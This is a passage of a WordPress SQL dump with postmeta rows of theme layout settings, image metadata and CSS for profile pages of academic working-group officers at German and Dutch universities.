.dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(14440,2791,'_wp_page_template','default'),
(14441,2791,'_dt_microsite_primary_menu',''),
(14442,2791,'_dt_microsite_split_left_menu',''),
(14443,2791,'_dt_microsite_split_right_menu',''),
(14444,2791,'_dt_microsite_mobile_menu',''),
(14445,2835,'_edit_lock','1665768433:1'),
(14446,2836,'_wp_attached_file','2022/10/w141.jpg'),
(14447,2836,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:142;s:6:\"height\";i:189;s:4:\"file\";s:16:\"2022/10/w141.jpg\";s:8:\"filesize\";i:29473;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w141-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4007;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14448,2835,'_thumbnail_id','2836'),
(14449,2835,'_edit_last','1'),
(14450,2835,'_dt_sidebar_position','disabled'),
(14451,2835,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14452,2835,'_dt_sidebar_hide_on_mobile','0'),
(14453,2835,'_dt_footer_show','1'),
(14454,2835,'_dt_footer_widgetarea_id','sidebar_2'),
(14455,2835,'_dt_footer_hide_on_mobile','0'),
(14456,2835,'_dt_header_title','fancy'),
(14457,2835,'_dt_header_background','normal'),
(14458,2835,'_dt_header_background_below_slideshow','disabled'),
(14459,2835,'_dt_header_transparent_bg_color_scheme','light'),
(14460,2835,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14461,2835,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14462,2835,'_dt_header_transparent_bg_color','#000000'),
(14463,2835,'_dt_header_transparent_bg_opacity','50'),
(14464,2835,'_dt_header_disabled_background','normal'),
(14465,2835,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14466,2835,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14467,2835,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14468,2835,'_dt_header_disabled_transparent_bg_color','#000000'),
(14469,2835,'_dt_header_disabled_transparent_bg_opacity','50'),
(14470,2835,'_dt_page_overrides_top_margin',''),
(14471,2835,'_dt_page_overrides_right_margin',''),
(14472,2835,'_dt_page_overrides_bottom_margin',''),
(14473,2835,'_dt_page_overrides_left_margin',''),
(14474,2835,'_dt_mobile_page_padding_top',''),
(14475,2835,'_dt_mobile_page_padding_right',''),
(14476,2835,'_dt_mobile_page_padding_bottom',''),
(14477,2835,'_dt_mobile_page_padding_left',''),
(14478,2835,'_dt_fancy_header_layout_heading',''),
(14479,2835,'_dt_fancy_header_title_aligment','center'),
(14480,2835,'_dt_fancy_header_height','300'),
(14481,2835,'_dt_fancy_header_padding-top','0px'),
(14482,2835,'_dt_fancy_header_padding-bottom','0px'),
(14483,2835,'_dt_fancy_header_breadcrumbs_heading',''),
(14484,2835,'_dt_fancy_header_breadcrumbs','disabled'),
(14485,2835,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14486,2835,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14487,2835,'_dt_fancy_header_title_heading',''),
(14488,2835,'_dt_fancy_header_title_mode','custom'),
(14489,2835,'_dt_fancy_header_title','Norbert Haala University of Stuttgart, Germany (WG I/7)'),
(14490,2835,'_dt_fancy_header_title_font_size','30'),
(14491,2835,'_dt_fancy_header_title_line_height','36'),
(14492,2835,'_dt_fancy_header_text_transform','none'),
(14493,2835,'_dt_fancy_header_title_color_mode','color'),
(14494,2835,'_dt_fancy_header_title_color','#ffffff'),
(14495,2835,'_dt_fancy_header_subtitle_heading',''),
(14496,2835,'_dt_fancy_header_subtitle',''),
(14497,2835,'_dt_fancy_header_subtitle_font_size','18'),
(14498,2835,'_dt_fancy_header_subtitle_line_height','26'),
(14499,2835,'_dt_fancy_header_subtitle_text_transform','none'),
(14500,2835,'_dt_fancy_header_subtitle_color_mode','color'),
(14501,2835,'_dt_fancy_header_subtitle_color','#ffffff'),
(14502,2835,'_dt_fancy_header_bg_heading',''),
(14503,2835,'_dt_fancy_header_bg_color','#222222'),
(14504,2835,'_dt_fancy_header_bg_image_origin','custom'),
(14505,2835,'_dt_fancy_header_bg_image','a:0:{}'),
(14506,2835,'_dt_fancy_header_bg_repeat','no-repeat'),
(14507,2835,'_dt_fancy_header_bg_position_x','center'),
(14508,2835,'_dt_fancy_header_bg_position_y','center'),
(14509,2835,'_dt_fancy_header_bg_fullscreen','1'),
(14510,2835,'_dt_fancy_header_bg_overlay','0'),
(14511,2835,'_dt_fancy_header_overlay_color','#000'),
(14512,2835,'_dt_fancy_header_bg_overlay_opacity','50'),
(14513,2835,'_dt_fancy_header_scroll_effect','default'),
(14514,2835,'_dt_fancy_header_bg_parallax','0.5'),
(14515,2835,'_dt_fancy_header_responsiveness_heading',''),
(14516,2835,'_dt_fancy_header_responsiveness','enabled'),
(14517,2835,'_dt_fancy_header_responsiveness_switch','778px'),
(14518,2835,'_dt_fancy_header_responsive_height','70'),
(14519,2835,'_dt_fancy_header_responsive_font_size','30'),
(14520,2835,'_dt_fancy_header_responsive_title_line_height','38'),
(14521,2835,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14522,2835,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14523,2835,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14524,2835,'_dt_teammate_options_go_to_single','1'),
(14525,2835,'_dt_teammate_options_position',''),
(14526,2835,'_dt_teammate_options_website',''),
(14527,2835,'_dt_teammate_options_mail',''),
(14528,2835,'_dt_teammate_options_facebook',''),
(14529,2835,'_dt_teammate_options_twitter',''),
(14530,2835,'_dt_teammate_options_dribbble',''),
(14531,2835,'_dt_teammate_options_you-tube',''),
(14532,2835,'_dt_teammate_options_rss',''),
(14533,2835,'_dt_teammate_options_delicious',''),
(14534,2835,'_dt_teammate_options_flickr',''),
(14535,2835,'_dt_teammate_options_lastfm',''),
(14536,2835,'_dt_teammate_options_linkedin',''),
(14537,2835,'_dt_teammate_options_vimeo',''),
(14538,2835,'_dt_teammate_options_tumbler',''),
(14539,2835,'_dt_teammate_options_pinterest',''),
(14540,2835,'_dt_teammate_options_devian',''),
(14541,2835,'_dt_teammate_options_skype',''),
(14542,2835,'_dt_teammate_options_github',''),
(14543,2835,'_dt_teammate_options_instagram',''),
(14544,2835,'_dt_teammate_options_stumbleupon',''),
(14545,2835,'_dt_teammate_options_behance',''),
(14546,2835,'_dt_teammate_options_px-500',''),
(14547,2835,'_dt_teammate_options_tripedvisor',''),
(14548,2835,'_dt_teammate_options_vk',''),
(14549,2835,'_dt_teammate_options_foursquare',''),
(14550,2835,'_dt_teammate_options_xing',''),
(14551,2835,'_dt_teammate_options_weibo',''),
(14552,2835,'_dt_teammate_options_odnoklassniki',''),
(14553,2835,'_dt_teammate_options_research-gate',''),
(14554,2835,'_dt_teammate_options_yelp',''),
(14555,2835,'_dt_teammate_options_blogger',''),
(14556,2835,'_dt_teammate_options_soundcloud',''),
(14557,2835,'_dt_teammate_options_viber',''),
(14558,2835,'_dt_teammate_options_whatsapp',''),
(14559,2835,'_dt_teammate_options_reddit',''),
(14560,2835,'_dt_teammate_options_snapchat',''),
(14561,2835,'_dt_teammate_options_telegram',''),
(14562,2835,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14563,2837,'_edit_lock','1665768436:1'),
(14564,2838,'_wp_attached_file','2022/10/w142.jpg'),
(14565,2838,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:140;s:6:\"height\";i:189;s:4:\"file\";s:16:\"2022/10/w142.jpg\";s:8:\"filesize\";i:47378;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w142-140x150.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6335;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14566,2837,'_thumbnail_id','2838'),
(14567,2837,'_edit_last','1'),
(14568,2837,'_dt_sidebar_position','disabled'),
(14569,2837,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14570,2837,'_dt_sidebar_hide_on_mobile','0'),
(14571,2837,'_dt_footer_show','1'),
(14572,2837,'_dt_footer_widgetarea_id','sidebar_2'),
(14573,2837,'_dt_footer_hide_on_mobile','0'),
(14574,2837,'_dt_header_title','fancy'),
(14575,2837,'_dt_header_background','normal'),
(14576,2837,'_dt_header_background_below_slideshow','disabled'),
(14577,2837,'_dt_header_transparent_bg_color_scheme','light'),
(14578,2837,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14579,2837,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14580,2837,'_dt_header_transparent_bg_color','#000000'),
(14581,2837,'_dt_header_transparent_bg_opacity','50'),
(14582,2837,'_dt_header_disabled_background','normal'),
(14583,2837,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14584,2837,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14585,2837,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14586,2837,'_dt_header_disabled_transparent_bg_color','#000000'),
(14587,2837,'_dt_header_disabled_transparent_bg_opacity','50'),
(14588,2837,'_dt_page_overrides_top_margin',''),
(14589,2837,'_dt_page_overrides_right_margin',''),
(14590,2837,'_dt_page_overrides_bottom_margin',''),
(14591,2837,'_dt_page_overrides_left_margin',''),
(14592,2837,'_dt_mobile_page_padding_top',''),
(14593,2837,'_dt_mobile_page_padding_right',''),
(14594,2837,'_dt_mobile_page_padding_bottom',''),
(14595,2837,'_dt_mobile_page_padding_left',''),
(14596,2837,'_dt_fancy_header_layout_heading',''),
(14597,2837,'_dt_fancy_header_title_aligment','center'),
(14598,2837,'_dt_fancy_header_height','300'),
(14599,2837,'_dt_fancy_header_padding-top','0px'),
(14600,2837,'_dt_fancy_header_padding-bottom','0px'),
(14601,2837,'_dt_fancy_header_breadcrumbs_heading',''),
(14602,2837,'_dt_fancy_header_breadcrumbs','disabled'),
(14603,2837,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14604,2837,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14605,2837,'_dt_fancy_header_title_heading',''),
(14606,2837,'_dt_fancy_header_title_mode','custom'),
(14607,2837,'_dt_fancy_header_title','Franz Rottensteiner Leibniz University Hannover, Germany (WG II/3)'),
(14608,2837,'_dt_fancy_header_title_font_size','30'),
(14609,2837,'_dt_fancy_header_title_line_height','36'),
(14610,2837,'_dt_fancy_header_text_transform','none'),
(14611,2837,'_dt_fancy_header_title_color_mode','color'),
(14612,2837,'_dt_fancy_header_title_color','#ffffff'),
(14613,2837,'_dt_fancy_header_subtitle_heading',''),
(14614,2837,'_dt_fancy_header_subtitle',''),
(14615,2837,'_dt_fancy_header_subtitle_font_size','18'),
(14616,2837,'_dt_fancy_header_subtitle_line_height','26'),
(14617,2837,'_dt_fancy_header_subtitle_text_transform','none'),
(14618,2837,'_dt_fancy_header_subtitle_color_mode','color'),
(14619,2837,'_dt_fancy_header_subtitle_color','#ffffff'),
(14620,2837,'_dt_fancy_header_bg_heading',''),
(14621,2837,'_dt_fancy_header_bg_color','#222222'),
(14622,2837,'_dt_fancy_header_bg_image_origin','custom'),
(14623,2837,'_dt_fancy_header_bg_image','a:0:{}'),
(14624,2837,'_dt_fancy_header_bg_repeat','no-repeat'),
(14625,2837,'_dt_fancy_header_bg_position_x','center'),
(14626,2837,'_dt_fancy_header_bg_position_y','center'),
(14627,2837,'_dt_fancy_header_bg_fullscreen','1'),
(14628,2837,'_dt_fancy_header_bg_overlay','0'),
(14629,2837,'_dt_fancy_header_overlay_color','#000'),
(14630,2837,'_dt_fancy_header_bg_overlay_opacity','50'),
(14631,2837,'_dt_fancy_header_scroll_effect','default'),
(14632,2837,'_dt_fancy_header_bg_parallax','0.5'),
(14633,2837,'_dt_fancy_header_responsiveness_heading',''),
(14634,2837,'_dt_fancy_header_responsiveness','enabled'),
(14635,2837,'_dt_fancy_header_responsiveness_switch','778px'),
(14636,2837,'_dt_fancy_header_responsive_height','70'),
(14637,2837,'_dt_fancy_header_responsive_font_size','30'),
(14638,2837,'_dt_fancy_header_responsive_title_line_height','38'),
(14639,2837,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14640,2837,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14641,2837,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14642,2837,'_dt_teammate_options_go_to_single','1'),
(14643,2837,'_dt_teammate_options_position',''),
(14644,2837,'_dt_teammate_options_website',''),
(14645,2837,'_dt_teammate_options_mail',''),
(14646,2837,'_dt_teammate_options_facebook',''),
(14647,2837,'_dt_teammate_options_twitter',''),
(14648,2837,'_dt_teammate_options_dribbble',''),
(14649,2837,'_dt_teammate_options_you-tube',''),
(14650,2837,'_dt_teammate_options_rss',''),
(14651,2837,'_dt_teammate_options_delicious',''),
(14652,2837,'_dt_teammate_options_flickr',''),
(14653,2837,'_dt_teammate_options_lastfm',''),
(14654,2837,'_dt_teammate_options_linkedin',''),
(14655,2837,'_dt_teammate_options_vimeo',''),
(14656,2837,'_dt_teammate_options_tumbler',''),
(14657,2837,'_dt_teammate_options_pinterest',''),
(14658,2837,'_dt_teammate_options_devian',''),
(14659,2837,'_dt_teammate_options_skype',''),
(14660,2837,'_dt_teammate_options_github',''),
(14661,2837,'_dt_teammate_options_instagram',''),
(14662,2837,'_dt_teammate_options_stumbleupon',''),
(14663,2837,'_dt_teammate_options_behance',''),
(14664,2837,'_dt_teammate_options_px-500',''),
(14665,2837,'_dt_teammate_options_tripedvisor',''),
(14666,2837,'_dt_teammate_options_vk',''),
(14667,2837,'_dt_teammate_options_foursquare',''),
(14668,2837,'_dt_teammate_options_xing',''),
(14669,2837,'_dt_teammate_options_weibo',''),
(14670,2837,'_dt_teammate_options_odnoklassniki',''),
(14671,2837,'_dt_teammate_options_research-gate',''),
(14672,2837,'_dt_teammate_options_yelp',''),
(14673,2837,'_dt_teammate_options_blogger',''),
(14674,2837,'_dt_teammate_options_soundcloud',''),
(14675,2837,'_dt_teammate_options_viber',''),
(14676,2837,'_dt_teammate_options_whatsapp',''),
(14677,2837,'_dt_teammate_options_reddit',''),
(14678,2837,'_dt_teammate_options_snapchat',''),
(14679,2837,'_dt_teammate_options_telegram',''),
(14680,2837,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14681,2839,'_edit_lock','1665769404:1'),
(14682,2840,'_wp_attached_file','2022/10/w143.jpg'),
(14683,2840,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:152;s:6:\"height\";i:189;s:4:\"file\";s:16:\"2022/10/w143.jpg\";s:8:\"filesize\";i:39063;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w143-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4380;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14684,2839,'_thumbnail_id','2840'),
(14685,2839,'_edit_last','1'),
(14686,2839,'_dt_sidebar_position','disabled'),
(14687,2839,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14688,2839,'_dt_sidebar_hide_on_mobile','0'),
(14689,2839,'_dt_footer_show','1'),
(14690,2839,'_dt_footer_widgetarea_id','sidebar_2'),
(14691,2839,'_dt_footer_hide_on_mobile','0'),
(14692,2839,'_dt_header_title','fancy'),
(14693,2839,'_dt_header_background','normal'),
(14694,2839,'_dt_header_background_below_slideshow','disabled'),
(14695,2839,'_dt_header_transparent_bg_color_scheme','light'),
(14696,2839,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14697,2839,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14698,2839,'_dt_header_transparent_bg_color','#000000'),
(14699,2839,'_dt_header_transparent_bg_opacity','50'),
(14700,2839,'_dt_header_disabled_background','normal'),
(14701,2839,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14702,2839,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14703,2839,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14704,2839,'_dt_header_disabled_transparent_bg_color','#000000'),
(14705,2839,'_dt_header_disabled_transparent_bg_opacity','50'),
(14706,2839,'_dt_page_overrides_top_margin',''),
(14707,2839,'_dt_page_overrides_right_margin',''),
(14708,2839,'_dt_page_overrides_bottom_margin',''),
(14709,2839,'_dt_page_overrides_left_margin',''),
(14710,2839,'_dt_mobile_page_padding_top',''),
(14711,2839,'_dt_mobile_page_padding_right',''),
(14712,2839,'_dt_mobile_page_padding_bottom',''),
(14713,2839,'_dt_mobile_page_padding_left',''),
(14714,2839,'_dt_fancy_header_layout_heading',''),
(14715,2839,'_dt_fancy_header_title_aligment','center'),
(14716,2839,'_dt_fancy_header_height','300'),
(14717,2839,'_dt_fancy_header_padding-top','0px'),
(14718,2839,'_dt_fancy_header_padding-bottom','0px'),
(14719,2839,'_dt_fancy_header_breadcrumbs_heading',''),
(14720,2839,'_dt_fancy_header_breadcrumbs','disabled'),
(14721,2839,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14722,2839,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14723,2839,'_dt_fancy_header_title_heading',''),
(14724,2839,'_dt_fancy_header_title_mode','custom'),
(14725,2839,'_dt_fancy_header_title','Michael Ying Yang University of Twente,  The Netherlands (WG II/5)'),
(14726,2839,'_dt_fancy_header_title_font_size','30'),
(14727,2839,'_dt_fancy_header_title_line_height','36'),
(14728,2839,'_dt_fancy_header_text_transform','none'),
(14729,2839,'_dt_fancy_header_title_color_mode','color'),
(14730,2839,'_dt_fancy_header_title_color','#ffffff'),
(14731,2839,'_dt_fancy_header_subtitle_heading',''),
(14732,2839,'_dt_fancy_header_subtitle',''),
(14733,2839,'_dt_fancy_header_subtitle_font_size','18'),
(14734,2839,'_dt_fancy_header_subtitle_line_height','26'),
(14735,2839,'_dt_fancy_header_subtitle_text_transform','none'),
(14736,2839,'_dt_fancy_header_subtitle_color_mode','color'),
(14737,2839,'_dt_fancy_header_subtitle_color','#ffffff'),
(14738,2839,'_dt_fancy_header_bg_heading',''),
(14739,2839,'_dt_fancy_header_bg_color','#222222'),
(14740,2839,'_dt_fancy_header_bg_image_origin','custom'),
(14741,2839,'_dt_fancy_header_bg_image','a:0:{}'),
(14742,2839,'_dt_fancy_header_bg_repeat','no-repeat'),
(14743,2839,'_dt_fancy_header_bg_position_x','center'),
(14744,2839,'_dt_fancy_header_bg_position_y','center'),
(14745,2839,'_dt_fancy_header_bg_fullscreen','1'),
(14746,2839,'_dt_fancy_header_bg_overlay','0'),
(14747,2839,'_dt_fancy_header_overlay_color','#000'),
(14748,2839,'_dt_fancy_header_bg_overlay_opacity','50'),
(14749,2839,'_dt_fancy_header_scroll_effect','default'),
(14750,2839,'_dt_fancy_header_bg_parallax','0.5'),
(14751,2839,'_dt_fancy_header_responsiveness_heading',''),
(14752,2839,'_dt_fancy_header_responsiveness','enabled'),
(14753,2839,'_dt_fancy_header_responsiveness_switch','778px'),
(14754,2839,'_dt_fancy_header_responsive_height','70'),
(14755,2839,'_dt_fancy_header_responsive_font_size','30'),
(14756,2839,'_dt_fancy_header_responsive_title_line_height','38'),
(14757,2839,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14758,2839,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14759,2839,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14760,2839,'_dt_teammate_options_go_to_single','1'),
(14761,2839,'_dt_teammate_options_position',''),
(14762,2839,'_dt_teammate_options_website',''),
(14763,2839,'_dt_teammate_options_mail',''),
(14764,2839,'_dt_teammate_options_facebook',''),
(14765,2839,'_dt_teammate_options_twitter',''),
(14766,2839,'_dt_teammate_options_dribbble',''),
(14767,2839,'_dt_teammate_options_you-tube',''),
(14768,2839,'_dt_teammate_options_rss',''),
(14769,2839,'_dt_teammate_options_delicious',''),
(14770,2839,'_dt_teammate_options_flickr',''),
(14771,2839,'_dt_teammate_options_lastfm',''),
(14772,2839,'_dt_teammate_options_linkedin',''),
(14773,2839,'_dt_teammate_options_vimeo',''),
(14774,2839,'_dt_teammate_options_tumbler',''),
(14775,2839,'_dt_teammate_options_pinterest',''),
(14776,2839,'_dt_teammate_options_devian',''),
(14777,2839,'_dt_teammate_options_skype',''),
(14778,2839,'_dt_teammate_options_github',''),
(14779,2839,'_dt_teammate_options_instagram',''),
(14780,2839,'_dt_teammate_options_stumbleupon',''),
(14781,2839,'_dt_teammate_options_behance',''),
(14782,2839,'_dt_teammate_options_px-500',''),
(14783,2839,'_dt_teammate_options_tripedvisor',''),
(14784,2839,'_dt_teammate_options_vk',''),
(14785,2839,'_dt_teammate_options_foursquare',''),
(14786,2839,'_dt_teammate_options_xing',''),
(14787,2839,'_dt_teammate_options_weibo',''),
(14788,2839,'_dt_teammate_options_odnoklassniki',''),
(14789,2839,'_dt_teammate_options_research-gate',''),
(14790,2839,'_dt_teammate_options_yelp',''),
(14791,2839,'_dt_teammate_options_blogger',''),
(14792,2839,'_dt_teammate_options_soundcloud',''),
(14793,2839,'_dt_teammate_options_viber',''),
(14794,2839,'_dt_teammate_options_whatsapp',''),
(14795,2839,'_dt_teammate_options_reddit',''),
(14796,2839,'_dt_teammate_options_snapchat',''),
(14797,2839,'_dt_teammate_options_telegram',''),
(14798,2839,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14799,2835,'rs_page_bg_color',''),
(14800,2837,'rs_page_bg_color',''),
(14802,2841,'_wp_attached_file','2022/10/m2-2.jpg'),
